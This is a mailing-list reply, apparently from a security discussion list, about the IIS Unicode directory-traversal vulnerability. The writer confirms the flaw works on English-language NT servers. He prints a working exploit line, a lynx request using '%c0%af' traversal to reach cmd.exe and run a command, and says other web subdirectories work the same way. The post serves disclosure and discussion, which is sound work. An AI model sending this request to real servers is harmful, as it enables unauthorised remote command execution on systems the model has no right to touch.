Re: IIS and unicode

["Robert A. Seace" <ras () SLARTIBARTFAST MAGRATHEA COM>]

In the profound words of aliver vilereal:
> ok,
> is it true that the unicode exploit only works under foreign machines =
> that use 2-byte characters?  if so, how can i check (in a http response) =
> if this is a vulnerable system.  i have heard that english systems are =
> also vulnerable, but require a differnt string to be passed to them, is =
> this true?

        No, it's NOT just foreign versions...  I tested an NT machine
we have at work (standard US/English NT/IIS install; I'm not sure
about versions/patchlevels; I'm not an MS guy, at all), and I was
easily able to run arbitrary commands on it...  The only char sequence
I tried was "%c0%af"...  I'm not sure if others might work, as well...
Specifically, this worked perfectly (done from a Unix box, of course):

lynx -dump 'http://NTServerNameHere/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\'

        Also, replacing "msadc" with "scripts" or "cgi-bin" works
just as well...  (Seemingly any valid, accessible subdir off
the web root? *shrug*)

--
||========================================================================||
||    Rob Seace    ||               URL              || ras () magrathea com ||
||  AKA: Agrajag   || http://www.magrathea.com/~ras/ || rob () wordstock com ||
||========================================================================||
"The secret of healthy hitchhiking is to eat junk food." - TRATEOTU